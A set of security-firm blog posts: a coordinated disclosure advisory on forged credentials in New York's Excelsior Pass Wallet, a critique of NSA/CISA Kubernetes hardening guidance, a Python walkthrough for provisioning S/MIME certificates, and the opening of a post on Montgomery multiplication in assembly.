Technical Advisory – New York State Excelsior Pass Vaccine Passport Credential Forgery

1 September 2021 at 19:00
Vendor: New York State
Vendor URL: https://play.google.com/store/apps/details?id=gov.ny.its.healthpassport.wallet
Versions affected: 1.2.0
Systems Affected: Android Google Play Store
Author: Siddarth Adukia sid.adukia[at]nccgroup[dot]com

Summary

New York State developed an application called NYS Excelsior Pass Wallet that allows users to acquire and store a COVID-19 vaccine credential. During some research it was discovered that this application does not validate vaccine credentials added to it, allowing forged credentials to be stored by users.

Impact

This issue would allow an individual to create and store fake vaccine credentials in their NYS Excelsior
Pass Wallet that might allow them to gain access to physical spaces (such as businesses and event venues) where they would not be allowed without a vaccine credential, even when they have not received a COVID-19 vaccine.

Details

The Wallet application can add a pass directly by interacting with the NYS servers, or through scanning a QR code or photo. In neither case is the credential verified, allowing forged credentials to be added to the Wallet. Screenshots of forged credentials are included; these may be scanned by the Wallet app and added as a legitimate pass.

If a business does not properly use the NYS Scanner application, or ignores the invalid pass warning in the Scanner app and trusts the pass shown in the Excelsior Wallet app on a user’s smartphone, it could allow individuals to fake vaccine credentials and gain access to physical spaces that are only supposed to be accessible to those with valid, legitimate proof of vaccination.

Fix from Vendor

Vendor informed NCC Group they intend to implement verification for vaccine credentials added to the NYS Excelsior Pass Wallet. This fix was released in the August 20 2021 version of the app.

Recommendation to Users

Update to the latest version of the application.

Users of the NYS Excelsior Pass Scanner (such as businesses and event venues) should take care while scanning presented vaccine credentials to confirm that each presented credential is successfully validated by the Scanner application, ensuring that the credential is legitimate.

Vendor Communication

2021-04-30 NCC Group starts disclosure to NYS via support form - no response
2021-06-07 NCC Group submits another request to coordinate a disclosure - no response
2021-06-10 NCC Group calls NYS Excelsior support and is instructed to wait or contact the Department of Health 
2021-06-17 NCC Group emails DOH requesting to start disclosure process - no response
2021-06-25 NCC Group emails DOH to follow up on previous email - no response
2021-07-08 NCC Group emails DOH and requests acknowledgment - no response 
2021-07-16 NCC Group emails NYS ITS Cyber command center requesting to start a disclosure 
2021-07-20 NYS ITS sets up meeting to discuss vulnerabilities
2021-07-21 NCC Group meets with NYS ITS team and shares vulnerabilities and recommends fixes
2021-07-21 NYS ITS sends email with patch details and date 
2021-08-20 Patch released
2021-09-01 Advisory published

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date:  2021-09-01

Written by:  Siddarth Adukia

[Editor’s note: The disclosure timeline on this post was updated September 2 2021 to correct the patch date which was incorrectly noted in the original post. This was also corrected in the “Fix from Vendor” section. The issue was patched on August 20 2021; the original advisory had stated that it was August 12 2021]

NSA & CISA Kubernetes Security Guidance – A Critical Review

9 September 2021 at 15:08

Last month, the United States’ National Security Agency (NSA) and Cybersecurity and Infrastructure Security Agency (CISA) released a Cybersecurity Technical Report (CTR) detailing the security hardening they recommend be applied to Kubernetes clusters, which is available here. The guidance the document contains is generally reasonable, but there are several points which are either incorrect or do not provide sufficient context for administrators to make good security-focused decisions.

In this blog post, we begin by outlining the general guidance (“The Good“), and then highlight some points where the CTR is either misleading or incorrect (“The Bad” and “The Complex“). This post is split into three parts:

  1. The Good
  2. The Bad: Places where the NSA/CISA guidance overlooked important aspects of Kubernetes security, or where the guidance was out of date at time of publication.
  3. The Complex: Considerations for some of the more common complex use cases not covered by the CTR guidance, including useful audit configurations that won’t require excessive levels of compute power or storage, handling external dependencies, and some notes around the complex mechanisms of Kubernetes RBAC.

The Good

On the whole, the guidance provided is sensible and will help administrators bring their clusters to a reasonable and secure state.

The high level guidance from the document is as below:

  • Scan containers and Pods for vulnerabilities or misconfigurations
  • Run containers and Pods with the least privileges possible
  • Use network separation to control the amount of damage a compromise can cause
  • Use firewalls to limit unneeded network connectivity and encryption to protect confidentiality
  • Use strong authentication and authorization to limit user and administrator access as well as to limit the attack surface
  • Use log auditing so that administrators can monitor activity and be alerted to potential malicious activity
  • Periodically review all Kubernetes settings and use vulnerability scans to help ensure risks are appropriately accounted for and security patches are applied

Each of these points relate back to the generic guidance for almost any platform, regardless of the technology in use: restrict access through authentication and network filtering, log what is permitted and what gets requested, apply security options where available, and keep components up to date.

The guidance also calls out the common sources of compromise, identifying supply chain attacks, malicious threat actors, and insider threats. Despite “malicious threat actors” covering a fairly broad scope as an answer to “who wants to hack us?”, these three sources of compromise cover the majority of the attack paths we have followed when reviewing customer environments.

High Level Recommendations

Scan Container Images

Vulnerability scanning is a key component of staying secure, regardless of the platform used. Performing image scanning on your images can be a good way to prevent the software you are running from becoming open to newly identified vulnerabilities.

Patching container images generally needs to happen in two stages: downloading fresh versions of the published image from a vendor, and applying any patches which have been released since the image was last built through a package manager like apt or yum. As with patching of any other system, care should be taken to ensure that all of your software still works as intended after any patches have been applied. You should also make sure all images are pulled from trusted sources (such as official Docker images, or images from verified publishers). Additionally, any programming language based dependencies (Ruby/Bundler, Python/Pip etc.) should be updated regularly.

Follow the Principle of Least Privilege

Running containers with the lowest level of privileges possible will help to reduce the blast radius of a compromise, reducing what an attacker is able to do should they gain access to a single pod through a remote code execution (RCE) vulnerability in a microservice or similar. This can be accomplished in a few ways, the simplest of which is to build container images to run as a non-root user.

Kubernetes can also force a container to run as a specific user through the use of the SecurityContext directive. This approach is effective, but may result in file permission problems in images which expect to be run as UID 0.

The NSA/CISA guidance does also mention the possibility to use a rootless Docker engine. While this can work for a standalone Docker instance, support is not widely available for running a rootless engine in Kubernetes and doing so is generally not advised on production systems.

Another option is to use user namespacing, effectively allowing contained processes to run “as root” inside but mapping to a non-0 UID on the host. This feature is supported on Docker, but is only in alpha levels of support in Kubernetes.

The concepts applied to running pods should also be applied to anywhere authentication and authorization are applied, such as Kubernetes RBAC and service account configurations. Service accounts have permissions which are effectively granted to any running pod configured to use that account. These permissions are rarely required for standard applications, and so most service accounts do not need any permissions at all.

Isolate Networks

Suggesting enforcing isolation between components is common security advice. Recommending the use of both host/network firewalling and Kubernetes network policies to provide this isolation is good advice, and something that we generally don’t see enough of on customer engagements. It’s not uncommon for us to see environments where the Kubernetes apiserver is exposed to the internet, and for the cluster itself to be completely flat. This means any compromise of one service can provide an attacker with a path to other services, some of which may be running without authentication requirements.

As a minimum we recommend isolating namespaces through the use of a default deny-all network policy for both ingress and egress, then only permitting the connections that are explicitly required. For more sensitive environments we often see customers choose to use a service mesh such as Istio or Linkerd to provide further filtering and additional encryption, however these options do tend to increase operational complexity significantly (and aren’t without their own security issues).

Logging Configuration

Like with network isolation, we regularly see customer deployments running without any logging or auditing enabled. Enabling these features will massively help to identify ongoing attacks should your cluster be targeted, as well as providing essential forensic information should the worst happen and the cluster be compromised by a malicious user.

Regular Configuration Review

Kubernetes clusters require ongoing maintenance, and are not systems which can simply be set and forgotten. Between the relentless patching cycle, an increasing number of security releases and bugfixes, and changes to API versions, regular configuration changes will be required. Checking that security options are applied correctly or tweaking configurations to improve the security posture over time is expected as part of routine maintenance.

As discussed extensively in the released document, Kubernetes clusters are rarely configured securely out of the box. For organisations running multiple clusters, having a standardised deployment process with known-secure options applied will help you ensure consistency.

The Bad

Some of the advice contained in the CTR was not as accurate or up-to-date as guidance from other sources. While not necessarily bad advice, some of the core concepts in Kubernetes security are not discussed in the document, or are not given the attention they deserve.

PSP Deprecation

The biggest issue I have with the guidance is the over-reliance on Pod Security Policy (PSP) as a solution for a range of problems. When first released, PSP was the only available control to prevent a user with the ability to create pods from compromising an entire node in a trivial manner. The guidance correctly points out the many features of PSP, but it does not call out that the PSP feature is officially deprecated, and will be removed in the 1.25 release. This may be because the authors did not want to recommend a specific third party alternative, and the official replacement was only recently formalised.

Several technologies have appeared over the last few years which aim to fix holes in the PSP model, including OPA Gatekeeper, Kyverno, and k-rail. The official replacement for PSP, a newly introduced alpha feature called PodSecurity, will be added in Kubernetes 1.22 when it releases later this year.

The deprecation of PSP has only been a matter of time, and our advice for some time now has been to implement one of the PSP replacements rather than spend large amounts of engineering time on a feature that will be removed in the next year. Until the PodSecurity admission controller is more mature, this is still our recommendation to customers.

Admission Controllers

Pod Security Policy, and each of the alternatives, is implemented as an admission controller in a Kubernetes cluster. Admission controllers are an “extra” step, required for approval after a request has passed authentication and authorization checks. These controllers can provide a vast amount of security hardening in an automated manner. Despite this, they were only mentioned in the released guidance once, as part of the image scanning section.

A well-configured admission controller can automatically enforce a significant number of the checks around pod security, for instance by blocking pods which attempt to run with the privileged flag, or programmatically adding the “RunAsUser” field to force every pod to run as a non-root user.
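As an illustration of how small such a check can be, the sketch below is a hypothetical validating webhook written with Flask (it assumes Flask is installed and that the webhook has been registered with the apiserver over TLS; it is not taken from any of the products mentioned above). It receives an AdmissionReview for pod creation and denies the request if any container asks for the privileged flag.

from flask import Flask, request, jsonify

app = Flask(__name__)

@app.route("/validate", methods=["POST"])
def validate():
    review = request.get_json()
    pod = review["request"]["object"]
    # Deny the request if any container in the pod requests privileged mode
    privileged = any(
        (c.get("securityContext") or {}).get("privileged", False)
        for c in pod.get("spec", {}).get("containers", [])
    )
    return jsonify({
        "apiVersion": "admission.k8s.io/v1",
        "kind": "AdmissionReview",
        "response": {
            "uid": review["request"]["uid"],
            "allowed": not privileged,
            "status": {"message": "privileged containers are not permitted"},
        },
    })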

Inconsistencies/Incorrect Information

The CTR did contain a couple of inconsistencies, or pieces of information which were not correct. For example, page 4 of the guidance states that both the Kubelet and the Scheduler run on TCP 10251 by default. In actuality the Kubelet’s default port is TCP port 10250 for the read-write port, and 10255 for the soon-to-be-deprecated read-only port. Page 15 does provide the correct information for the Kubelet’s read-write port, but does not make any mention of the read-only port. Similarly, the kube-scheduler component runs on TCP port 10259, not 10251, in modern installs, and the controller-manager runs on 10257.

Kubernetes also has an insecure API mode, which the CTR correctly identifies as bypassing all AuthN/AuthZ checks and not using TLS encryption. However, this insecure port was deprecated in version 1.20. Since this release, the --insecure-port flag is only accepted as a parameter if the value is set to 0. If you are running a cluster and have the insecure port enabled, access should be extremely locked down and well monitored/audited, but in general there is no reason this port should be enabled in a modern cluster.

Authentication Issues

When it comes to authentication, the CTR is largely incorrect when it states that Kubernetes does not provide an authentication method by default. While the specifics will vary from install to install, the majority of clusters we review support both token and certificate authentication, both of which are supported natively. While these are supported, we generally advise against using either for production workloads as each has its downsides. In particular, client certificate authentication can cause issues when it comes to removing access, for example if a cluster administrator needs to be cut off, as Kubernetes does not support certificate revocation. This becomes more of an issue if an attacker manages to gain access to a certificate issued to the group system:masters, as this group has hard-coded administrative access to the apiserver.

The Complex

With a project as complicated as Kubernetes, it is not possible to cover every option and every edge case in a single document, so no piece of one-size-fits-all guidance can be complete. Here, I would like to offer considerations for some of the more common complex use cases not covered by the CTR guidance. This includes coming up with a useful audit configuration that won’t require excessive levels of compute power or storage, handling external dependencies, and some notes around the complex mechanisms of Kubernetes RBAC.

Levels of Audit Data

While enabling auditing is an excellent idea for a cluster, Kubernetes is heavily reliant on control loops that constantly generate HTTP requests. Logging every request, and particularly logging the request and response data as suggested in Appendix L of the released guidance, would result in massive amounts of data being stored, the vast majority of which reflects expected behaviour and is of little use for forensics or debugging. Similarly, the guidance explicitly suggests logging all pod creation requests, which will capture a large amount of routine activity such as pods scaling or being moved from one node to another by the scheduler. Instead of logging full requests, we recommend writing a tailored policy which includes metadata for most requests, and only stores full request/response information for particularly sensitive calls. The exact logging requirements will vary from deployment to deployment in line with your security standards but, in general, logging everything is not essential, and can have adverse effects on storage requirements and processing time. In some cases it can drastically increase operational costs if logs are ingested into a cloud service or a managed service which charges per log entry.
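As a purely illustrative sketch of such a tailored policy (not a recommended configuration; the resource selections are assumptions), the snippet below keeps full request/response bodies only for RBAC changes, records metadata only for everything else, and drops the noisy RequestReceived stage. It builds the policy as a Python dict and uses PyYAML to emit the manifest.

import yaml

audit_policy = {
    "apiVersion": "audit.k8s.io/v1",
    "kind": "Policy",
    "omitStages": ["RequestReceived"],   # skip the noisiest stage entirely
    "rules": [
        {   # full request/response bodies only for sensitive RBAC changes
            "level": "RequestResponse",
            "resources": [{"group": "rbac.authorization.k8s.io",
                           "resources": ["clusterrolebindings", "rolebindings"]}],
        },
        {   # secrets and configmaps: metadata only, never log the contents
            "level": "Metadata",
            "resources": [{"group": "", "resources": ["secrets", "configmaps"]}],
        },
        {"level": "Metadata"},           # catch-all: metadata only for everything else
    ],
}

print(yaml.safe_dump(audit_policy, sort_keys=False))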

Sidecar Resource Requirements

Similarly, the CTR advises that logging can be performed in a number of ways. This is true, and again the option you choose will depend on your specific setup. However, logging sidecars on every container does come with an increase in deployment complexity and a significant increase in resource requirements per pod.

Again, there is no “correct” logging deployment, and each option will have pros and cons. That said, it may be more efficient to have containers log to a specific directory on each node and use either a daemonset or some component of the host configuration to pick up these logs and pass them to a centralised logging location.

External Dependencies are essential

The core of a Kubernetes cluster is composed of container images, which are generally pulled from an external source. For example, the apiserver is generally retrieved from k8s.gcr.io/kube-apiserver. Even excluding the core components, most cloud-native technologies tend to assume they’re being run in a highly connected environment where updates can be retrieved in a trivial manner.

Most Kubernetes clusters can be reconfigured to require only local images, but if you decide to enable such restrictions, performing updates will become much more difficult. Given the update cadence of Kubernetes, increasing upgrade friction may not be something you want, leading to the old tradeoff of usability vs security. On the other hand, always pulling the latest version of an external dependency without performing any validation and security testing may open an organisation to supply-chain compromise. The likelihood of this varies, as some repositories will be better monitored and are less likely to be compromised in the first place, but it’s still something to consider.

Container signing is still very much not a solved problem. Historically, Docker Content Trust was viewed as the best option where it was enabled, but that mechanism was not without its problems and is no longer maintained. Several solutions are being worked on, including sigstore.

As well as verifying that your external dependencies are legitimate and not altered from the original packages, these containers may contain security vulnerabilities. At time of writing, the image k8s.gcr.io/etcd:3.5.0-0 (the newest version packaged for Kubernetes) has packages vulnerable to CVE-2020-29652, which shows as a high risk vulnerability when scanned with an image scanner like Trivy or Clair. Again, you could probably take on the task of patching these images, but that leads to further problems: do you want to be responsible for performing all the testing that patching will require, and what will you do when images contain vulnerabilities for which no patch exists?

RBAC is hard

Kubernetes RBAC is a difficult thing to configure well, and on engagements we regularly see customers who have an RBAC configuration allowing users or attackers to escalate their permissions, often to the point of gaining full administrative control over the cluster. Plenty of guidance is available on the internet around how to do Kubernetes RBAC securely, and that goes way beyond the scope of this post.

Patching Everything is hard

This post has already discussed the difficulties of keeping the software shipped in containers up to date, but patching of the worker nodes themselves is equally important. Unless you’re running a cluster backed by something like AWS’ Fargate, containers are still running on a computer that you need to keep updated. Vulnerabilities have historically been identified in every step of the execution chain, from Kubernetes to Containerd to runc and the Linux kernel. Keeping all of these components updated can be challenging, especially as there’s always the chance of breaking changes and requirements for downtime.

This is something that Kubernetes can help with, as the whole concept of orchestration is intended to keep services running even as nodes go online and offline. Despite this, we still regularly see customers running nodes that haven’t had patches applied in several months, or even years. (As a tip, server uptime isn’t a badge of honour as much as it used to be; it’s more likely indicative that you’re running an outdated kernel.)

Closing Thoughts

The advice issued in this NSA/CISA document has a solid technical grounding and should generally be followed, but some aspects are outdated or are missing some key context. This is almost always the case with anything in Kubernetes given the rapid development pace at which the project is still working. As with any technical security guidance, documents such as this CTR should be taken as guidance and reviewed with suitable levels of business/security context, because when it comes to container security, one size definitely does not fit all.

CertPortal: Building Self-Service Secure S/MIME Provisioning Portal

10 September 2021 at 06:48

tl;dr

NCC Group’s Research & Development team designed and built CertPortal which allows users to create and manage S/MIME certificates automating the registration and renewal to allow enterprise scale deployment.

The core of the system integrates with DigiCert to create an S/MIME certificate and then stores the certificate, the password, and the creation and expiry dates in a CyberArk safe. It then publishes the public certificate in the Microsoft Exchange Global Address List against the user’s account.

The portal presents the user with the two options of ‘show me my password’ and ‘download certificate’. This approach has removed a number of manual processes whilst providing significant efficiency and security gains.

The Beginning

Encryption as standard is both a crowning jewel and a backbone of modern HTTP traffic, so much so that browsers warn users of websites that do not offer it. On top of that, services like Let’s Encrypt make the process of adding encryption to a public facing website easy.

In the world of S/MIME this is not the case. There are services such as DigiCert or Entrust which allow API users to automatically generate S/MIME certificates, but this still leaves a large burden on the IT team to run the scripts to generate a password and private key, request a certificate, then securely deliver all of the above to the end user.

In steps CertPortal, an S/MIME self-service portal to fill this void. It needs to be able to do three things well:

  1. On request generate a password, private key, and CSR, request a certificate, and generate a PFX file.
  2. Securely store those files and retrieve them on request.
  3. Provide a simple-to-use interface for users to perform the first two things.

In this post we will be discussing the first thing: Generating an S/MIME certificate.

Passwords, Private Keys, and CSRs

Assuming we have received a request to generate an S/MIME certificate the first thing we need to do is prepare ourselves to request a certificate from our Certificate Authority. This requires us to create a cryptographically secure password, a private key, and a Certificate Signing Request (CSR).

Secure Passwords

The first step is to generate a secure password. Fortunately for us, the secrets module has been available since Python 3.6, which makes this process fairly straightforward. We want our script to be repeatable, so we will store our generated password on local disk; if we have a failure later on in the pipeline we can easily restart the process and try again.

This means we need to check our storage directory for an existing password file and return the contents if found. Otherwise we need to generate a cryptographically secure password, store it in the storage directory, and return the newly generated password.

import os
import secrets

PWD_CHRS = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*-+=,."
PWD_LEN = 16


def get_password(storage_dir: str) -> bytes:
    pwd_file = os.path.join(storage_dir, 'password.txt')
    try:
        with open(pwd_file, 'rb') as f:
            password = f.read()
    except FileNotFoundError:
        list_rand_chrs = [secrets.choice(PWD_CHRS) for _ in range(PWD_LEN)]
        password_str = ''.join(list_rand_chrs)
        password = password_str.encode('utf-8')
        with open(pwd_file, 'wb') as f:
            f.write(password)

    return password

The interesting line in the above excerpt is the one generating the password. Choosing the password characters and length is a matter for your own security policies. There are three steps to generating the password:

  1. Generate a list of random characters: [secrets.choice(PWD_CHRS) for _ in range(PWD_LEN)]
  2. Convert the list into a string: ''.join(list_rand_chrs)
  3. Convert the string into its bytes representation: password_str.encode('utf-8')

Private Keys

Once we have a password the next step is to generate a private key. To achieve this we will use the cryptography package. Like the previous step we want this step to be robust and repeatable.

This means we need to check our storage directory for an existing private key file, load it using the password, and return it. Otherwise we generate a new private key, encrypt it with the password, store it in the storage directory, and return the new private key.

import os

from cryptography.hazmat.primitives.serialization import load_pem_private_key
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives import serialization

KEY_SIZE = 4096


def get_private_key(storage_dir: str, password: bytes):
    key_file = os.path.join(storage_dir, 'private.key')
    try:
        with open(key_file, 'rb') as f:
            key = load_pem_private_key(
                f.read(), password, default_backend())
    except (ValueError, FileNotFoundError):
        key = rsa.generate_private_key(
            public_exponent=65537,
            backend=default_backend(),
            key_size=KEY_SIZE)

        with open(key_file, 'wb') as f:
            f.write(key.private_bytes(
                encoding=serialization.Encoding.PEM,
                format=serialization.PrivateFormat.TraditionalOpenSSL,
                encryption_algorithm=serialization.BestAvailableEncryption(password)))

    return key

This process is fairly straightforward when you know what you’re doing. The important part is choosing the key size, which should be at least 2048 bits; common choices such as 2048 and 4096 are powers of two (the excerpt above uses 4096).

Certificate Signing Requests

The last part of this step is creating the Certificate Signing Request (CSR). To achieve this simply follow the tutorial provided by the cryptography package with a couple of minor amendments:

from cryptography import x509
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.backends import default_backend as cryptography_default_backend
from cryptography.x509.oid import NameOID

csr = x509.CertificateSigningRequestBuilder().subject_name(x509.Name([
    # Provide various details about who we are
    x509.NameAttribute(NameOID.COMMON_NAME, csr_attrs['common_name']),
    x509.NameAttribute(NameOID.COUNTRY_NAME, csr_attrs['country_name']),
    x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, csr_attrs['state_name']),
    x509.NameAttribute(NameOID.LOCALITY_NAME, csr_attrs['locality_name']),
    x509.NameAttribute(NameOID.ORGANIZATION_NAME, csr_attrs['organization_name']),
    x509.NameAttribute(NameOID.ORGANIZATIONAL_UNIT_NAME, csr_attrs['organization_unit_name']),
])
).add_extension(x509.SubjectAlternativeName([
    x509.DNSName(csr_attrs['common_name'])
]), critical=False
).sign(key, hashes.SHA512(), cryptography_default_backend())

We need to set the ‘Common Name’ and ‘Subject Alternative Name’ to the email address the S/MIME certificate is being generated for. There is no need to check the storage directory for an existing CSR as, unlike the password and private key, the CSR will be the same every time (if we use the same private key).

Asking the Certificate Authority

Now that we have a password, private key, and CSR we can move onto asking the Certificate Authority (CA) for an S/MIME certificate. This step will vary depending on which provider we are going to use, but the basic process is the same for all (a generic sketch follows the list below):

  1. Authenticate with their API
  2. Request a new S/MIME type certificate from their API
  3. Store the request ID returned for future reference
  4. Wait until the S/MIME certificate has been issued
  5. Download the certificate (including all chain certificates)
  6. Store the certificates in the same storage directory as the password, private key, and CSR
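A generic, hedged sketch of those six steps is shown below. The endpoint paths, field names and polling interval are assumptions made purely for illustration; they do not correspond to DigiCert’s (or any other CA’s) actual API, so treat this as an outline of the flow rather than working integration code.

import time

import requests

CA_API = "https://ca.example.com/api"   # hypothetical CA endpoint
API_KEY = "..."                          # loaded from secure configuration in practice


def request_smime_certificate(csr_pem: str, email: str) -> dict:
    headers = {"Authorization": f"Bearer {API_KEY}"}                     # 1. authenticate
    resp = requests.post(f"{CA_API}/smime/requests",                     # 2. request certificate
                         json={"csr": csr_pem, "email": email},
                         headers=headers)
    resp.raise_for_status()
    request_id = resp.json()["id"]                                        # 3. store the request ID

    while True:                                                           # 4. wait until issued
        status = requests.get(f"{CA_API}/smime/requests/{request_id}",
                              headers=headers).json()
        if status["state"] == "issued":
            break
        time.sleep(30)

    chain = requests.get(f"{CA_API}/smime/requests/{request_id}/chain",   # 5. download certificates
                         headers=headers).json()
    return chain  # 6. caller stores these alongside the password, key, and CSR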

Bundle into a PFX (PKCS12) file

Lastly, we need to bundle the private key, S/MIME certificate, and chain certificates into a PFX (PKCS12) file for our end user to be able to download via the portal. To do this we will require one more Python package: pyOpenSSL, imported as OpenSSL (note that the cryptography package added PKCS12 serialization in version 3; however, CertPortal currently uses version 2). Like the CSR, the process here is straightforward when you know what you are doing:

import os

from OpenSSL import crypto


def get_pfx(storage_dir: str, cert, chain: list, key, password: bytes, friendly_name: bytes = None):
    """
    Generate a PFX (PKCS12) from the certificate(s), key, and password then store it in a file
    called `smime.pfx` inside `storage_dir`.
    :param storage_dir: Directory to store the PFX file
    :param cert: cryptography S/MIME certificate
    :param chain: List of cryptography chain certificates issued by the CA
    :param key: The cryptography private key
    :param password: The private key password
    :param friendly_name: The friendly name in the PKCS #12 structure
    """
    pfx = crypto.PKCS12()
    pfx.set_friendlyname(friendly_name or b'S/MIME Certificate')
    pfx.set_privatekey(crypto.PKey.from_cryptography_key(key))
    pfx.set_certificate(crypto.X509.from_cryptography(cert))
    pfx.set_ca_certificates([crypto.X509.from_cryptography(c) for c in chain])
    pfx_data = pfx.export(password)

    with open(os.path.join(storage_dir, certificate_file_name('pfx')), 'wb') as f:
        f.write(pfx_data)

    return pfx

We start by creating a crypto.PKCS12 object and setting a friendly name for the certificate. Next we set the private key. Then we set the S/MIME certificate (after converting it from the cryptography object) and do the same for the CA certificates. Finally we export the data and store it in the storage directory.

Conclusion

At the end of this process we have a secure password, private key, CSR, and PFX ready to be downloaded by the end user. We still need to be able to securely store these files and provide an interface for an end user to generate a new certificate and access existing certificates. We will address the secure storage in a future post.

We hope that this post has given you a good understanding of how to create an S/MIME certificate programmatically.

Final remarks

We have only looked at the bare bones of this process and as such skipped over many best practices such as storing the configurations, using interfaces and implementing CA specific backends, etc. These are, however, outside the scope of the post.

Optimizing Pairing-Based Cryptography: Montgomery Multiplication in Assembly

10 September 2021 at 08:30

This is the second blog post in a new code-centric series about selected optimizations found in pairing-based cryptography. Pairing operations are foundational to the BLS Signatures central to Ethereum 2.0, the zero-knowledge arguments underpinning Filecoin, and a wide variety of other emerging applications.

While my prior blog series, “Pairing over BLS12-381,” implemented the entire pairing operation from start to finish in roughly 200 lines of high-level Haskell, this current blog series, “Optimizing Pairing-Based Cryptography” looks at lower-level performance optimizations in more operational systems. The first post in this series covered modular Montgomery arithmetic in Rust from start to finish. This second post takes the Montgomery multiplication algorithm developed in Rust even further to seek the maximum performance a modern x86-64 machine can deliver from an implementation hand-written in assembly language. Several specialized instructions and advanced micro-architectural features enabling increased parallelism result in a Montgomery multiplication routine running more than 15X faster than a generic Big Integer implementation.

Overview

Pairing-based cryptography is fascinating because it utilizes such a wide variety of concepts, algorithms, techniques and optimizations. For reference, the big picture on pairing can be reviewed in the prior series of blog posts listed below.

Pairing over BLS12-381, Part 1: Fields
Pairing over BLS12-381, Part 2: Curves
Pairing over BLS12-381, Part 3: Pairing!

This current blog post focuses on optimizing the most expensive of basic field arithmetic operations: modular multiplication. First, a reference function implemented in Rust with the BigUint library crate is presented alongside a similar reference function adapted for use with Montgomery-form operands. Second, a more optimized routine utilizing operands constructed solely from 64-bit unsigned integers and developed in the prior blog post is presented – this serves as the jumping-off point for assembly language optimization. Third, the complete assembly routine is developed and described with interspersed insights on CPU architecture, micro-architecture, and register allocation. This post then wraps up with some figure-of-merit benchmarking results that compare the various implementations.

All of the code is available, ready-to-run and ready-to-modify for your own experimentation. The code is nicely self-contained and understandable, with zero functional dependencies and minimal test/build complexity. On Ubuntu 20.04 with Rust, git and clang preinstalled, it is as simple as:

$ git clone https://github.com/nccgroup/pairing.git
$ cd pairing/mont2
$ RUSTFLAGS="--emit asm -C target-cpu=native" cargo bench

The Reference Operations

Rust, along with the BigUint library crate, makes the basic modular multiplication operation exceptionally easy to code. The excerpt below defines the BLS12-381 prime field modulus with the lazy_static macro and then proceeds to implement the modular multiplication function mul_biguint() using that fixed modulus. This reference function corresponds to the modular multiplication performance a generic application might achieve, and is used later as the benchmark baseline. [Code excerpt on GitHub]

As described in the prior blog post, the Montgomery multiplication algorithm has a lot more potential for performance optimization but uses operands in the Montgomery form ã = a · R mod N, where a is the normal value (or normal form), N is the MODULUS and R is 2^384 in our scenario. When operands in Montgomery form are multiplied together, an instance of R^-1 needs to be factored into the calculation in order to maintain the result in correct Montgomery form. Thus, the actual operation is mont_mul(ã, b̃) = ã · b̃ · R^-1 mod N. The code below declares the R^-1 = R_INV constant as calculated in the prior blog post, utilizes the same MODULUS constant declared above, and so implements our mont_mul_biguint() Montgomery multiplication reference function. [Code excerpt on GitHub]

Note that the above function currently has even worse performance characteristics than the prior baseline. This is due to the additional multiplication involving R_INV delivering an even larger input to the very expensive modular reduction operator which involves a division operation. However, it can serve as a more formalized definition of correct functionality, so it will be used internally to support the test code which compares actual versus expected results across different implementations. As an aside, recall that the extra expense of converting the operands to/from Montgomery form is expected to be amortized across many (hopefully now much faster) interim operations.
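The relationship itself is easy to sanity-check with toy numbers. The short Python snippet below is an illustration only (the real code uses the 381-bit BLS12-381 prime and R = 2^384, and pow(R, -1, N) requires Python 3.8 or later): it shows that multiplying two Montgomery-form values and folding in R^-1 yields exactly the Montgomery form of the ordinary product.

N = 23                    # toy modulus (the real one is the BLS12-381 prime)
R = 32                    # toy R, coprime to N (the real one is 2**384)
R_INV = pow(R, -1, N)     # modular inverse of R mod N

def to_mont(a):           # a -> a * R mod N (Montgomery form)
    return (a * R) % N

def from_mont(a_m):       # Montgomery form -> normal form
    return (a_m * R_INV) % N

def mont_mul(a_m, b_m):   # Montgomery form of a*b, i.e. a_m * b_m * R^-1 mod N
    return (a_m * b_m * R_INV) % N

a, b = 7, 9
assert from_mont(mont_mul(to_mont(a), to_mont(b))) == (a * b) % N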

Montgomery Multiplication Using Rust’s Built-In Types

The primary issue with each of the above multiplication routines is the expensive division lurking underneath the modulo operator. The BigUint crate is wonderful in that it supports both arbitrary precision operands and moduli. However, this flexibility precludes some of the aggressive performance optimizations that can be implemented with fixed-size operands and a constant modulus.

The Rust code shown below from the prior blog post introduces the fixed data structure used for the operands. Operands consist of an array of six 64-bit unsigned integers, each known as a limb. This is followed by the ‘magic constant’ N_PRIME derived in the prior blog post for use in the reduction step, and then the complete Montgomery multiplication function using only Rust’s built-in operators and data types. [Code excerpt on GitHub]

There are three interesting and related things to observe in the code above.

  1. A temp array is declared on line 107 that is capable of holding twelve 64-bit limbs. Intuitively, that size makes sense since the overall operation involves a multiplication of two operands, where each operand consists of six 64-bit limbs, so a ‘double-width’ intermediate result is appropriate.
  2. The outer loop wraps a partial product step in the first inner loop followed by a reduction step in the second inner loop, and the outer loop index i always acts as a base address whenever the temp array is accessed. Looking more closely at the logic executed during each outer loop iteration, only seven limbs of the temp array are ever active, which is a noticeably smaller working set relative to the overall size of twelve in the temp declaration.
  3. As the outer loop iterates, the code essentially steps forward through the working set of the temp array from least significant toward most significant limb, never going fully backwards. In fact, incrementing the loop index i and using it as a base address means the least significant values are effectively falling away one at a time; the final result is derived from only the most significant six limbs of the temp array.

These three observations suggest that it is possible to elegantly implement the work done inside the outer loop within only a handful of active registers. The outer loop can then either iterate as shown or be unrolled, while it shifts the working set one step forward through the temp array each time.

An Aside: CPU Architecture, Micro-architecture, and Register Allocation

Some basic foundation needs to be built prior to jumping into the assembly language implementation. While the term ‘CPU Architecture’ does not have a single, simple or perfectly agreed-upon definition, in this context it describes the higher-level software instruction set and programming model of a processor system – the programmer’s view. At a lower level, the term ‘CPU Micro-architecture’ then describes how a specific processor implementation is logically organized to execute that instruction set – these underlying mechanisms are largely hidden from the application programmer. Both areas have seen tremendous progress and greater complexity over time in the never ending quest for performance that largely comes from increased parallelism. There are a few things to observe for each topic, starting from the lower-level and working upwards.

CPU Micro-architecture

A view into the micro-architecture of Intel’s Core2 machine is shown below. While that machine is over a decade old, the diagram remains very instructive and more modern versions have similar structure with greatly increased capacities. The assembly code we soon develop should run well on all modern Intel and AMD x86-64 processors shipped within the past 5 years (at least).

